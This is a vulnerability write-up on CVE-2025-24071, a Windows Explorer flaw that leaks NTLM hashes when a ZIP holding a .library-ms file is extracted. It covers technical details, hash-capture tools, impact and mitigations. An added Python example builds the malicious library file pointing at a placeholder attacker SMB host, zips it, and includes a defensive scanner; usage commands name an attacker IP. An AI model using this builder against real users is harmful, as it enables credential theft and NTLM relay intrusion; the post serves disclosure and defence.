Windows File Explorer NTLM Hash Disclosure via .library-ms Archive (CVE-2025-24071)
This post contains technical details about security vulnerabilities and exploit development for educational and research purposes only. All techniques described are intended for use in authorized penetration testing, CTF competitions, or controlled lab environments.
Unauthorized use of these techniques against systems you do not own or have explicit written permission to test is illegal and unethical. Always obtain proper authorization before testing.
Disclosure status: Full Disclosure
CVE references link to public NVD / vendor advisories. Proof-of-concept code, where included, is provided after patch availability for defensive research purposes.
Overview
CVE-2025-24071, a Windows File Explorer spoofing vulnerability, affects Windows 10 and Windows 11 systems.
The issue is triggered when Windows File Explorer processes a malicious .library-ms file that has been delivered inside a ZIP archive.
As soon as the archive is extracted, Explorer parses the library description and automatically attempts to connect to the remote SMB share named in the file. The victim does not need to open the .library-ms file; extraction alone is sufficient. The connection carries an NTLM authentication request to the attacker-controlled server.
As a result, the attacker can capture the victim's NTLM (NetNTLMv2) challenge-response hash, which can then be used in NTLM relay attacks or cracked offline to recover the password.
Affected Systems
Vendor: Microsoft
Affected operating systems:
- Windows 10
- Windows 11
Tested environment:
- Windows 11 (23H2)
Technical Details
The vulnerability abuses the .library-ms file format, an XML library description that Windows uses to define the locations backing a Library (Documents, Pictures, and so on).
A library description lists its locations under searchConnectorDescriptionList, and each location's path is carried in a simpleLocation/url element. A malicious .library-ms file points that element at a remote SMB path such as:
\\attacker-ip\shared
When the file is extracted from a ZIP archive, Windows Explorer immediately resolves the library's locations in order to display and index it, so the network location is contacted without any further user action.
This causes the victim system to initiate an SMB session with the attacker host, and SMB authenticates with NTLM: the client sends a challenge-response (NetNTLMv2) computed from the user's password hash, together with the username and domain.
If the attacker controls the SMB server, they can capture these challenge-response hashes using tools such as:
- Responder (its SMB server captures and logs NetNTLMv2 hashes)
- Impacket smbserver.py (run with -smb2support so modern Windows clients connect)
- Metasploit auxiliary/server/capture/smb
Proof of Concept (PoC)
The following Python tool generates a malicious .library-ms file and packages it inside a ZIP archive.
# place your exploit code here
How the Exploit Works
The exploit tool performs the following steps:
- Generates a malicious .library-ms file whose location points to an attacker-controlled SMB server.
- Packages the file into a ZIP archive.
- When the victim extracts the archive using Windows Explorer, the system attempts to access the remote SMB location.
- NTLM authentication is automatically sent to the attacker server, where it is captured.
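The following block is an added example, not the author's CVE-2025-24071_tool.py and not code from the original post. It illustrates both the file format described under Technical Details and the steps listed above: it builds a minimal .library-ms whose only location is a UNC path, packs it into a ZIP, and also provides a defensive pre-extraction check that lists every .library-ms member of a ZIP referencing a remote (UNC) location. The XML layout follows Microsoft's public Library Description schema; the attacker host, share name and output file names are placeholders. Nothing here connects to the network.

```python
"""Build a .library-ms that points at a remote SMB share, pack it into a ZIP,
and scan a ZIP for library files that reference UNC paths before extraction.
Added example; attacker host and share name below are placeholders."""
import argparse
import io
import re
import xml.etree.ElementTree as ET
import zipfile

# Namespace of the Windows Library Description schema used by .library-ms files.
LIBRARY_NS = "http://schemas.microsoft.com/windows/2007/library"
# Matches a UNC path of the form \\host\share...
UNC_RE = re.compile(r"^\\\\[^\\]+\\.+")


def build_library_ms(attacker_host: str, share: str = "shared") -> bytes:
    """Return a minimal library description whose single location is a UNC path.

    Explorer resolves <simpleLocation><url> when it displays/indexes the
    extracted file, which is what triggers the SMB connection and NTLM
    authentication to attacker_host."""
    unc = f"\\\\{attacker_host}\\{share}"
    xml = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<libraryDescription xmlns="{LIBRARY_NS}">\n'
        "  <searchConnectorDescriptionList>\n"
        "    <searchConnectorDescription>\n"
        "      <simpleLocation>\n"
        f"        <url>{unc}</url>\n"
        "      </simpleLocation>\n"
        "    </searchConnectorDescription>\n"
        "  </searchConnectorDescriptionList>\n"
        "</libraryDescription>\n"
    )
    return xml.encode("utf-8")


def package_zip(library_name: str, library_ms: bytes) -> bytes:
    """Return the bytes of a ZIP archive containing <library_name>.library-ms."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{library_name}.library-ms", library_ms)
    return buf.getvalue()


def find_remote_library_locations(zip_bytes: bytes) -> list[tuple[str, str]]:
    """Defensive check: list (member, url) for every .library-ms inside the ZIP
    whose location is a UNC path. Unparseable library files are reported too,
    since a benign library should always be well-formed XML."""
    hits: list[tuple[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for member in zf.namelist():
            if not member.lower().endswith(".library-ms"):
                continue
            try:
                root = ET.fromstring(zf.read(member))
            except ET.ParseError:
                hits.append((member, "<unparseable>"))
                continue
            for url in root.iter(f"{{{LIBRARY_NS}}}url"):
                text = (url.text or "").strip()
                if UNC_RE.match(text):
                    hits.append((member, text))
    return hits


if __name__ == "__main__":
    # Command-line front end modelled on the page's tool; flags are this example's own.
    parser = argparse.ArgumentParser(description="CVE-2025-24071 .library-ms/ZIP builder (example)")
    parser.add_argument("-i", "--ip", required=True, help="attacker SMB host")
    parser.add_argument("-n", "--name", default="payload", help="base name of the library file")
    parser.add_argument("-o", "--output", default="payload.zip", help="ZIP file to write")
    parser.add_argument("--keep", action="store_true", help="also write the bare .library-ms")
    args = parser.parse_args()

    lib = build_library_ms(args.ip)
    archive = package_zip(args.name, lib)
    with open(args.output, "wb") as fh:
        fh.write(archive)
    if args.keep:
        with open(f"{args.name}.library-ms", "wb") as fh:
            fh.write(lib)
    # Show what a scanner would flag on this archive.
    for member, url in find_remote_library_locations(archive):
        print(f"{args.output}: {member} -> {url}")
```

The scanner only inspects file contents; it does not extract anything to disk, so it can be run on a quarantined attachment before a user ever touches it in Explorer. A real gateway filter would also flag file:// URLs that name a remote host and library files nested in other archive formats.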
Usage
Generate the malicious archive using the following command:
python3 CVE-2025-24071_tool.py -i <attacker-ip> -n payload -o ./output
Example:
python3 CVE-2025-24071_tool.py -i 192.168.1.100 -n exploit -o ./output
Optional flag:
--keep
Keeps the generated .library-ms file on disk after the ZIP archive has been created (by default only the archive is left behind).
Impact
Successful exploitation may allow attackers to:
- Capture NetNTLMv2 challenge-response hashes of the user who extracts the archive
- Relay the captured authentication to other hosts (NTLM relay), where SMB signing or equivalent protections are not enforced
- Crack the hash offline to recover the user's plaintext password
- Use the recovered or relayed credentials to access internal network resources
Mitigation
Recommended mitigation steps include:
- Apply Microsoft security updates; the fix for CVE-2025-24071 shipped in the March 2025 Patch Tuesday release
- Restrict or disable NTLM authentication where possible (Network security: Restrict NTLM policies), and require SMB signing to blunt relay attacks
- Block outbound SMB (TCP 445) from workstations to the internet and to untrusted networks at the perimeter and host firewall
- Monitor for outbound SMB connections to external or unexpected hosts, and for .library-ms files arriving inside archives via email or downloads
Researcher
Security research conducted by:
Mohammed Idrees Banyamer
Cybersecurity Researcher – Jordan 🇯🇴
GitHub: https://github.com/mbanyamer
Disclaimer
This proof-of-concept is provided strictly for educational purposes and authorized security testing only. Unauthorized exploitation against systems without permission is illegal.
Disclosure: Full Disclosure